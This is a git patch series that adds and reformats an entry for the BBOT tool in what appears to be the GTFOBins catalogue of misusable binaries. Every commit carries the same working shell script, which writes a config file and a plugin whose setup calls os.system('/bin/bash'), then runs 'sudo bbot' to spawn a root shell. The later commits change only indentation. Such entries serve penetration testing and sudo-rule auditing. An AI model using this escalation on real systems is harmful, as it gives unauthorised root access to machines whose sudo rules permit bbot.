From 8ffd5cbbe5385933bc9642b48e3928e1ac8b842e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?= Date: Mon, 24 Mar 2025 06:50:59 +0800 Subject: [PATCH 1/4] Updated at 2025/03/24 --- _gtfobins/bbot.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 _gtfobins/bbot.md diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md new file mode 100644 index 00000000..0e1c4aa6 --- /dev/null +++ b/_gtfobins/bbot.md @@ -0,0 +1,27 @@ +--- +functions: + sudo: + - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") + async def handle_event(self, event): + self.hugeinfo(f"[*] Exiting shell ......") + EOF + sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost +--- \ No newline at end of file From 0da31e708c190cdd0742e08db0946200d520e2ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?= Date: Mon, 24 Mar 2025 06:56:58 +0800 Subject: [PATCH 2/4] Update bbot.md Updated on 2025/03/24 --- _gtfobins/bbot.md | 48 +++++++++++++++++++++++------------------------ 1 file changed, 24 insertions(+), 24 deletions(-) diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md index 0e1c4aa6..8d509a70 100644 --- a/_gtfobins/bbot.md +++ b/_gtfobins/bbot.md @@ -1,27 +1,27 @@ --- functions: sudo: - - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. - code: | - TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) - TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) - TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py - TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) - PLUGIN_NAME=init_userbash - cat << EOF > $TEMP_YMLCONF - targets: localhost - output_dir: $TEMP_OUTDIR - module_dirs: $TEMP_PLUGINDIR - EOF - cat << EOF > $TEMP_PLUGIN - import os - from bbot.modules.base import BaseModule - class init_userbash(BaseModule): - async def setup(self): - self.hugeinfo(f"[*] Starting a new user shell ......") - os.system("/bin/bash") - async def handle_event(self, event): - self.hugeinfo(f"[*] Exiting shell ......") - EOF - sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost ---- \ No newline at end of file + - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") + async def handle_event(self, event): + self.hugeinfo(f"[*] Exiting shell ......") + EOF + sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost +--- From 67d96a8d643b42193a3456becd6459336b0ce381 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?= Date: Mon, 24 Mar 2025 07:01:42 +0800 Subject: [PATCH 3/4] Update bbot.md Updated on 2025/03/24 --- _gtfobins/bbot.md | 38 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md index 8d509a70..0f5bdc1e 100644 --- a/_gtfobins/bbot.md +++ b/_gtfobins/bbot.md @@ -1,25 +1,25 @@ --- functions: sudo: - - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. - code: | - TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) - TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) - TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py - TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) - PLUGIN_NAME=init_userbash - cat << EOF > $TEMP_YMLCONF - targets: localhost - output_dir: $TEMP_OUTDIR - module_dirs: $TEMP_PLUGINDIR - EOF - cat << EOF > $TEMP_PLUGIN - import os - from bbot.modules.base import BaseModule - class init_userbash(BaseModule): - async def setup(self): - self.hugeinfo(f"[*] Starting a new user shell ......") - os.system("/bin/bash") + - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") async def handle_event(self, event): self.hugeinfo(f"[*] Exiting shell ......") EOF From bc54b7a2a042fa138a10ad3d67afa7f769f8d58f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BE=A1=E5=9D=8219008=E5=8F=B7?= Date: Mon, 24 Mar 2025 07:04:20 +0800 Subject: [PATCH 4/4] Update bbot.md Updated on 2025/03/24 --- _gtfobins/bbot.md | 44 ++++++++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/_gtfobins/bbot.md b/_gtfobins/bbot.md index 0f5bdc1e..cc4b58fa 100644 --- a/_gtfobins/bbot.md +++ b/_gtfobins/bbot.md @@ -2,26 +2,26 @@ functions: sudo: - description: This command creates a couple of malicious YML config files and BBOT plugins, then inits BBOT and triggers the malicious plugin. - code: | - TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) - TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) - TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py - TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) - PLUGIN_NAME=init_userbash - cat << EOF > $TEMP_YMLCONF - targets: localhost - output_dir: $TEMP_OUTDIR - module_dirs: $TEMP_PLUGINDIR - EOF - cat << EOF > $TEMP_PLUGIN - import os - from bbot.modules.base import BaseModule - class init_userbash(BaseModule): - async def setup(self): - self.hugeinfo(f"[*] Starting a new user shell ......") - os.system("/bin/bash") - async def handle_event(self, event): - self.hugeinfo(f"[*] Exiting shell ......") - EOF - sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost + code: | + TEMP_YMLCONF=$(mktemp /tmp/XXXXXXXX.yml) + TEMP_PLUGINDIR=$(mktemp -d /tmp/XXXXXXXX) + TEMP_PLUGIN=$TEMP_PLUGINDIR/init_userbash.py + TEMP_OUTDIR=$(mktemp -d /tmp/XXXXXXXX) + PLUGIN_NAME=init_userbash + cat << EOF > $TEMP_YMLCONF + targets: localhost + output_dir: $TEMP_OUTDIR + module_dirs: $TEMP_PLUGINDIR + EOF + cat << EOF > $TEMP_PLUGIN + import os + from bbot.modules.base import BaseModule + class init_userbash(BaseModule): + async def setup(self): + self.hugeinfo(f"[*] Starting a new user shell ......") + os.system("/bin/bash") + async def handle_event(self, event): + self.hugeinfo(f"[*] Exiting shell ......") + EOF + sudo bbot -p $TEMP_YMLCONF -m $PLUGIN_NAME -t localhost ---